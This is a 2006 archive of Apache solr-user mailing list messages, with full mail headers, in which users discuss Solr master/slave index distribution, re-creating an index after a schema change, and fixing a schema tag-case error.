tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS,FORGED_YAHOO_RCVD,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web50009.mail.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 24 Mar 2006 11:39:44 -0800 Received: (qmail 19227 invoked by uid 60001); 24 Mar 2006 19:39:23 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Date:From:Reply-To:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=mhLQeENQoxbXkh+ykGPJIWs9AhZ3HIJoVW+2nkMW/XlzUU45phFA2f0xc1y8r1cq4EYKNgQHhJfxvKjPcL5xg4UZ+eb4amD972d0i9MrtVw3zQnO7IC/BhBK6L2II9Cf3kx4J61Noqdc3csLyfGqujE5wMNXgTFj/bsn3w7G7fQ= ; Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 11:39:23 -0800 (PST) From: jason rutherglen <[email protected]> Reply-To: jason rutherglen <[email protected]> Subject: Re: To cluster, or not to cluster... To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1700645013-1143229163=:17182" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-1700645013-1143229163=:17182 Content-Type: text/plain; charset=us-ascii No because the data would be on the slave servers which would continue to server data. You could easily have mirrored master machines if you were worried about losing updates. Updates of a specific division or stripe would occur to both mirrored servers or [email protected]. Or fancier configurations could be done such as if a master fails, take it out and recopy the entire index from the good master. ----- Original Message ---- From: Robert Haycock <[email protected]> To: [email protected] Sent: Friday, March 24, 2006 11:26:58 AM Subject: RE: To cluster, or not to cluster... Hi Jason, Would that not mean if one of the master indexes went down then a subset of data would be offline? Rob. -----Original Message----- From: jason rutherglen [mailto:[email protected]] Sent: 24 March 2006 18:32 To: [email protected] Subject: Re: To cluster, or not to cluster... It should be possible to do clustering if you divide your master index over multiple master servers. Then write a wrapper around the SolrClient API using something like MultiSearcher. From what I know this would work, could be wrong. ----- Original Message ---- From: Clay Webster <[email protected]> To: [email protected] Sent: Friday, March 24, 2006 8:54:45 AM Subject: Re: To cluster, or not to cluster... On 3/24/06, Robert Haycock <[email protected]> wrote: > > Is it/will it be possible to cluster solr? > > We have a distributed system and it would be nice if we could replicate > the index to improve performance. > > Solr does not have replication. But it does have a very nice index distribution system. Solr can be run in a master/slave setup. The master receives all the changes. For each commit a snapshooter index can be made. The slaves can run the snappuller with whatever polling frequency they like. Each snapshot is then snapinstalled in the slave and can have its cache warmed (while serving queries from the older index). Slaves can come on line with new indexes out of sync. But if your slave hardware is the same and your pulling and shooting well-understood, and you make warming time-based it probably will not be a problem. This distribution is noted by each slave in the master. That's as tied together as they get (not much). So, if you have a requirement that they must all be in index-version-sync you could tie them closer and extend Solr. --cw --0-1700645013-1143229163=:17182-- From [email protected] Fri Mar 24 19:46:58 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51857 invoked from network); 24 Mar 2006 19:46:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 19:46:57 -0000 Received: (qmail 50999 invoked by uid 500); 24 Mar 2006 19:46:54 -0000 Delivered-To: [email protected] Received: (qmail 50968 invoked by uid 500); 24 Mar 2006 19:46:54 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50941 invoked by uid 99); 24 Mar 2006 19:46:54 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 11:46:54 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO sccrmhc11.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 11:46:53 -0800 Received: from andy (c-68-52-221-224.hsd1.tn.comcast.net[161.129.204.104]) by comcast.net (sccrmhc11) with SMTP id <20060324194631011002rrhse>; Fri, 24 Mar 2006 19:46:31 +0000 From: "John Mohr" <[email protected]> To: <[email protected]> Subject: What is proper way to re-init index? Date: Fri, 24 Mar 2006 13:45:07 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_000D_01C64F49.2966AEC0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506 Importance: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_NextPart_000_000D_01C64F49.2966AEC0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I've been working with Solr for just a few days. Initially I ran the exampldocs and things worked fine. I've now redefined the layout of the index to be more of what I'd like to see, generated my own xml files to index, blew away the old index/directories, restarted with the new schema file and it only creates the index and segment directories but not the complete index. Luke tells me I have a corrupted index. What is the proper way to create the index? I can go back to the pre-expansion solr.war file but that seems a bit drastic. ------=_NextPart_000_000D_01C64F49.2966AEC0-- From [email protected] Fri Mar 24 20:55:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99939 invoked from network); 24 Mar 2006 20:55:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 20:55:04 -0000 Received: (qmail 45398 invoked by uid 500); 24 Mar 2006 20:55:04 -0000 Delivered-To: [email protected] Received: (qmail 45380 invoked by uid 500); 24 Mar 2006 20:55:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45371 invoked by uid 99); 24 Mar 2006 20:55:04 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 12:55:04 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 12:55:03 -0800 Received: by wproxy.gmail.com with SMTP id 69so1020462wri for <[email protected]>; Fri, 24 Mar 2006 12:54:42 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=BtAu+3vK0kLTPfNpUoyQAfEj1rB3z4ZOOCGTyrRfeWmUI1paulDWM2yVVWXjK4aJM5mMWNk50OIIA23qkCyj+sZ2vEqZlL38G6jNWixZKh046faCAFTrDJ5Vn30WTB4EHVHl9I0Ipr1N4Sfn5YB8NSfm5xESxF/8+DZA1Hh8OBg= Received: by 161.129.204.104 with SMTP id z17mr294880pyl; Fri, 24 Mar 2006 12:54:42 -0800 (PST) Received: by 161.129.204.104 with HTTP; Fri, 24 Mar 2006 12:54:42 -0800 (PST) Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 15:54:42 -0500 From: "Bill Au" <[email protected]> To: [email protected] Subject: Re: What is proper way to re-init index? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_3659_18797931.1143233682126" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_3659_18797931.1143233682126 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline If you don't care about saving any data, you can just remove the index directory. Solr will create a new one if it does not already exist. You will need to repopulate your data. Bill On 3/24/06, John Mohr <[email protected]> wrote: > > I've been working with Solr for just a few days. Initially I ran the > exampldocs and things worked fine. I've now redefined the layout of the > index to be more of what I'd like to see, generated my own xml files to > index, blew away the old index/directories, restarted with the new schema > file and it only creates the index and segment directories but not the > complete index. Luke tells me I have a corrupted index. What is the prope= r > way to create the index? I can go back to the pre-expansion solr.war file > but that seems a bit drastic. > > ------=_Part_3659_18797931.1143233682126-- From [email protected] Fri Mar 24 21:33:07 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22875 invoked from network); 24 Mar 2006 21:33:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 21:33:06 -0000 Received: (qmail 96848 invoked by uid 500); 24 Mar 2006 21:33:06 -0000 Delivered-To: [email protected] Received: (qmail 96830 invoked by uid 500); 24 Mar 2006 21:33:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96821 invoked by uid 99); 24 Mar 2006 21:33:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 13:33:06 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 13:33:03 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id DF7435B76E; Fri, 24 Mar 2006 13:32:32 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id CEFC37F403 for <[email protected]>; Fri, 24 Mar 2006 13:32:32 -0800 (PST) Date: Fri, 24 Mar 2006 13:32:32 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: What is proper way to re-init index? In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : index to be more of what I'd like to see, generated my own xml files to : index, blew away the old index/directories, restarted with the new schema : file and it only creates the index and segment directories but not the : complete index. Luke tells me I have a corrupted index. What is the proper I'm not sure about Luke saying the index is corrupted -- that may just be because it's empty. It sounds like you never re-indexed your data after blowing away the old index. did you re-index the XML documents you made after you deleted the index directory? ... either using the post.sh script provided by the example, or by using some other client to POST the documents? -Hoss From [email protected] Fri Mar 24 21:40:09 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27603 invoked from network); 24 Mar 2006 21:40:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 21:40:07 -0000 Received: (qmail 11269 invoked by uid 500); 24 Mar 2006 21:40:06 -0000 Delivered-To: [email protected] Received: (qmail 11251 invoked by uid 500); 24 Mar 2006 21:40:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11241 invoked by uid 99); 24 Mar 2006 21:40:06 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 13:40:06 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 13:40:05 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 2BE4D5B76E; Fri, 24 Mar 2006 13:39:45 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id 237477F403 for <[email protected]>; Fri, 24 Mar 2006 13:39:45 -0800 (PST) Date: Fri, 24 Mar 2006 13:39:45 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: RE: Multiple updates possible? In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : In this case we are looking at having multiple tomcats to provide us : with load balancing and failover. We are not looking at a master/slave : index solution. We'll also be working on windows. I'm not very faimilar with windows, but if your goal is to have load balanced servers for failover, then what is the advantage of running those multiple servers on the same box (pointed at teh same index directory)? ... if the box goes down, you're up a creek. what we do is have one master port that recieves all of the updates and has a postCommit hook which makes snapshots. then we have many slave ports (running on other machines) which pull the snapshots at regular intervals, and are all accessible behind a load balancer. if one slave goes down -- no big deal, the load balancer stops using it. if the master goes down, the slaves happily keep serving queries, but new updates can't be published untill we install a "master" configuration (with thepostCommit hook) on one of the slaves, and change the DNS record for the master to point at that slave -- at which point it because the new master. I know the existing snapshotter/snappuller scripts in subversion don't work on windows, but one of the items on the task list is to try and come up with equivilent methods that can -- if you have any ideas on how that can be achieved that would be great! -Hoss From [email protected] Fri Mar 24 22:34:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58680 invoked from network); 24 Mar 2006 22:34:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 22:34:04 -0000 Received: (qmail 537 invoked by uid 500); 24 Mar 2006 22:34:04 -0000 Delivered-To: [email protected] Received: (qmail 520 invoked by uid 500); 24 Mar 2006 22:34:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 503 invoked by uid 99); 24 Mar 2006 22:34:03 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 14:34:03 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO sccrmhc14.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 14:34:00 -0800 Received: from andy (c-68-52-221-224.hsd1.tn.comcast.net[161.129.204.104]) by comcast.net (sccrmhc14) with SMTP id <2006032422333801400c5ibae>; Fri, 24 Mar 2006 22:33:39 +0000 From: "John Mohr" <[email protected]> To: <[email protected]> Subject: RE: What is proper way to re-init index? Date: Fri, 24 Mar 2006 16:32:12 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506 In-Reply-To: <[email protected]> Importance: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N After some fiddling around the base problem is that it takes my new schema, implies that the update went fine, but it didn't. Of no great surprise, the problem is that the schema for some reason doesn't match my data. It doesn't write out any data. Reconfiging with the example (old) data (and old schema) it writes it out just fine. Hmmm. It seems that further investigation is warranted. -----Original Message----- From: Chris Hostetter [mailto:[email protected]] Sent: Friday, March 24, 2006 3:33 PM To: [email protected] Subject: Re: What is proper way to re-init index? : index to be more of what I'd like to see, generated my own xml files to : index, blew away the old index/directories, restarted with the new schema : file and it only creates the index and segment directories but not the : complete index. Luke tells me I have a corrupted index. What is the proper I'm not sure about Luke saying the index is corrupted -- that may just be because it's empty. It sounds like you never re-indexed your data after blowing away the old index. did you re-index the XML documents you made after you deleted the index directory? ... either using the post.sh script provided by the example, or by using some other client to POST the documents? -Hoss From [email protected] Fri Mar 24 23:05:56 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75391 invoked from network); 24 Mar 2006 23:05:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 23:05:56 -0000 Received: (qmail 30280 invoked by uid 500); 24 Mar 2006 23:05:56 -0000 Delivered-To: [email protected] Received: (qmail 30260 invoked by uid 500); 24 Mar 2006 23:05:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30247 invoked by uid 99); 24 Mar 2006 23:05:56 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 15:05:56 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Mar 2006 15:05:54 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 87C005B76E; Fri, 24 Mar 2006 15:05:29 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id 7EC8A7F403 for <[email protected]>; Fri, 24 Mar 2006 15:05:29 -0800 (PST) Date: Fri, 24 Mar 2006 15:05:29 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: RE: What is proper way to re-init index? In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : After some fiddling around the base problem is that it takes my new schema, : implies that the update went fine, but it didn't. Of no great surprise, the : problem is that the schema for some reason doesn't match my data. It doesn't : write out any data. Reconfiging with the example (old) data (and old schema) : it writes it out just fine. Hmmm. It seems that further investigation is can you send a copy of your schema and and example of one "<add><doc>..." file? ... we might be able to help spot the problem. -Hoss From [email protected] Sun Mar 26 13:41:50 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55573 invoked from network); 26 Mar 2006 13:41:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Mar 2006 13:41:50 -0000 Received: (qmail 70878 invoked by uid 500); 26 Mar 2006 13:41:50 -0000 Delivered-To: [email protected] Received: (qmail 70847 invoked by uid 500); 26 Mar 2006 13:41:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 61184 invoked by uid 99); 25 Mar 2006 04:38:17 -0000 X-ASF-Spam-Status: No, hits=1.5 required=10.0 tests=HTML_MESSAGE,MIME_BASE64_TEXT X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) X-Antivirus-MYDOMAIN-Mail-From: [email protected] via mail.chinabidding.com X-Antivirus-MYDOMAIN: 1.22-st-qms (Clear:RC:0(161.129.204.104):SA:0(-2.9/10.0):. Processed in 30.393172 secs Process 16222) Message-ID: <007601c64fc5$bee295f0$fd00a8c0@wain> From: "Wain Wen" <[email protected]> To: <[email protected]> Subject: How to config a new analyzer Date: Sat, 25 Mar 2006 12:36:52 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0073_01C65008.CB1095A0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.2180 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, hits=-2.9 required=10.0 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_NextPart_000_0073_01C65008.CB1095A0 Content-Type: text/plain; charset="gb2312" Content-Transfer-Encoding: base64 SGk6DQoNClNvbHIgaXMgZ3JlYXQsIGFuZCBJIGFtIGEgbmV3YmllIGZvciBpdC4gDQpJIGRlcGxv eSBzb2xyIGludG8gdG9tY2F0LCBldmVyeXRoaW5nIGlzIG9rLiBIb3dldmVyLCB3aGVuIEkgY29u ZmlnIGEgbmV3IGFuYWx5emVyIGluIHNjaGVtYS54bWwgbGlrZSB0aGlzIChsdWNlbmUtYW5hbHl6 ZXJzLTEuOS4xLmphciBpbiBsaWIgcGF0aCk6DQogDQo8ZmllbGR0eXBlIG5hbWU9InRleHRfemgi IGNsYXNzPSJzb2xyLlRleHRGaWVsZCI+DQogICAgPGFuYWx5emVyIGNsYXNzPSJvcmcuYXBhY2hl Lmx1Y2VuZS5hbmFseXNpcy5jbi5DaGluZXNlQW5hbHl6ZXIiLz4NCjwvZmllbGRUeXBlPg0KDQpJ IGdldCBiZWxvdyBleGNlcHRpb246DQoNCm9yZy5hcGFjaGUuc29sci5jb3JlLlNvbHJFeGNlcHRp b246IFNjaGVtYSBQYXJzaW5nIEZhaWxlZA0KICBhdCBvcmcuYXBhY2hlLnNvbHIuc2NoZW1hLklu ZGV4U2NoZW1hLnJlYWRDb25maWcoSW5kZXhTY2hlbWEuamF2YTozNDgpDQogIGF0IG9yZy5hcGFj aGUuc29sci5zY2hlbWEuSW5kZXhTY2hlbWEuPGluaXQ+KEluZGV4U2NoZW1hLmphdmE6NjEpDQou Li4uLi4NCkNhdXNlZCBieTogb3JnLnhtbC5zYXguU0FYUGFyc2VFeGNlcHRpb246IFRoZSBlbGVt ZW50IHR5cGUgImZpZWxkdHlwZSIgbXVzdCBiZSB0ZXJtaW5hdGVkIGJ5IHRoZSBtYXRjaGluZyBl bmQtdGFnICI8L2ZpZWxkdHlwZT4iLg0KICBhdCBjb20uc3VuLm9yZy5hcGFjaGUueGVyY2VzLmlu dGVybmFsLnBhcnNlcnMuRE9NUGFyc2VyLnBhcnNlKFVua25vd24gU291cmNlKQ0KLi4uLi4uDQoN CkkgYW0gbm90IHN1cmUgd2hhdCBpcyB3cm9uZy4gDQpUaGFua3MuDQog ------=_NextPart_000_0073_01C65008.CB1095A0-- From [email protected] Mon Mar 27 00:50:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83838 invoked from network); 27 Mar 2006 00:50:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 00:50:37 -0000 Received: (qmail 28820 invoked by uid 500); 27 Mar 2006 00:50:36 -0000 Delivered-To: [email protected] Received: (qmail 28758 invoked by uid 500); 27 Mar 2006 00:50:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28745 invoked by uid 99); 27 Mar 2006 00:50:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 26 Mar 2006 16:50:36 -0800 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_WHOIS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO web32614.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 26 Mar 2006 16:50:35 -0800 Received: (qmail 45113 invoked by uid 60001); 27 Mar 2006 00:50:14 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=z+hwpjWFmLHu5DizL8Q1i8IFWyyMnw9g/o3xT02qHBGQ0a9256rEliQY4niC0msoZjHvIrJEXL6obvyzaMqc0mCmxTfJRxhsJey3NEEvaIQJWjLqVnnX8Kg8RMb9ZI+6O7O8lhsEj99ZszGDiFeC/9nXF8yA7JiCSF+aWbt7gg8= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web32614.mail.mud.yahoo.com via HTTP; Sun, 26 Mar 2006 16:50:14 PST Date: Sun, 26 Mar 2006 16:50:14 -0800 (PST) From: Phil Myers <[email protected]> Subject: Re: How to config a new analyzer To: [email protected] In-Reply-To: <007601c64fc5$bee295f0$fd00a8c0@wain> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello, Your closing tag is </fieldType>. It should be </fieldtype> (with a lower case t). phil --- Wain Wen <[email protected]> wrote: > Hi: > > Solr is great, and I am a newbie for it. > I deploy solr into tomcat, everything is ok. > However, when I config a new analyzer in schema.xml > like this (lucene-analyzers-1.9.1.jar in lib path): > > <fieldtype name="text_zh" class="solr.TextField"> > <analyzer > class="org.apache.lucene.analysis.cn.ChineseAnalyzer"/> > </fieldType> > > I get below exception: > > org.apache.solr.core.SolrException: Schema Parsing > Failed > at > org.apache.solr.schema.IndexSchema.readConfig(IndexSchema.java:348) > at > org.apache.solr.schema.IndexSchema.<init>(IndexSchema.java:61) > ...... > Caused by: org.xml.sax.SAXParseException: The > element type "fieldtype" must be terminated by the > matching end-tag "</fieldtype>". > at > com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(Unknown > Source) > ...... > > I am not sure what is wrong. > Thanks. > From [email protected] Mon Mar 27 15:00:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62835 invoked from network); 27 Mar 2006 15:00:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Mar 2006 15:00:35 -0000 Received: (qmail 44785 invoked by uid 500); 27 Mar 2006 15:00:30 -0000 Delivered-To: [email protected] Received: (qmail 44760 invoked by uid 500); 27 Mar 2006 15:00:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44751 invoked by uid 99); 27 Mar 2006 15:00:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 07:00:30 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rwcrmhc11.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 27 Mar 2006 07:00:29 -0800 Received: from andy (c-68-52-221-224.hsd1.tn.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc11) with SMTP id <20060327150007m1100c6874e>; Mon, 27 Mar 2006 15:00:07 +0000 From: "John Mohr" <[email protected]> To: <[email protected]> Subject: RE: What is proper way to re-init index? Date: Mon, 27 Mar 2006 08:59:06 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0005_01C6517C.B452AEF0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) In-Reply-To: <[email protected]> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506 Importance: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_NextPart_000_0005_01C6517C.B452AEF0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit The problem script, schema.xml file and exception are in the attached file. ------=_NextPart_000_0005_01C6517C.B452AEF0 Content-Type: text/plain; name="prob.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="prob.txt" Posting file new/howtocare2.xml to http://localhost:8983/solr/update=0A= <result status=3D"1">undefined field form</result><result = 